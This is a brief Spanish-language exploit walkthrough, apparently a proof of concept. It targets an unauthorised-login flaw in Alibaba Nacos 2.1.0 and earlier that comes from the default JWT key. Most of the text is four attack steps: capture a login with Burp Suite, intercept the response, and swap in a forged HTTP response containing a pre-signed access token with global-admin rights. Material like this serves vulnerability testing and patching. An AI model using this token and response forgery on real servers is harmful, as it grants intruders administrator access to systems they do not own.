
Alibab Nacos Unauthorized Login
Se ha descubierto un problema en Nacos que afecta a Nacos <= 2.1.0. Los usuarios de Nacos utilizan la clave JWT predeterminada, lo que provoca una vulnerabilidad de acceso no autorizado. Mediante esta vulnerabilidad, los atacantes pueden omitir la autenticación de nombre de usuario y contraseña e iniciar sesión directamente en el usuario de Nacos.
Versión Nacos <= 2.1.0
Paso 1:Vaya directamente al sitio web de Nacos, complete cualquier nombre de usuario y contraseña y use Burpsuite para capturar el paquete.

Paso 2:Intercepte el paquete de respuesta.

Paso 3: Modifique el paquete de datos de la siguiente manera
HTTP/1.1 200
Date: Thu, 10 Nov 2022 01:27:16 GMT
Content-Type: application/json
Content-Length: 13
Connection: close
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Content-Security-Policy: script-src 'self'
Server: elb
{"accessToken":"eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTYxODEyMzY5N30.nyooAL4OMdiByXocu8kL1ooXd1IeKj6wQZwIH8nmcNA","tokenTtl":18000,"globalAdmin":true}

Paso 4: Inicie sesión correctamente después de liberar el paquete de datos.
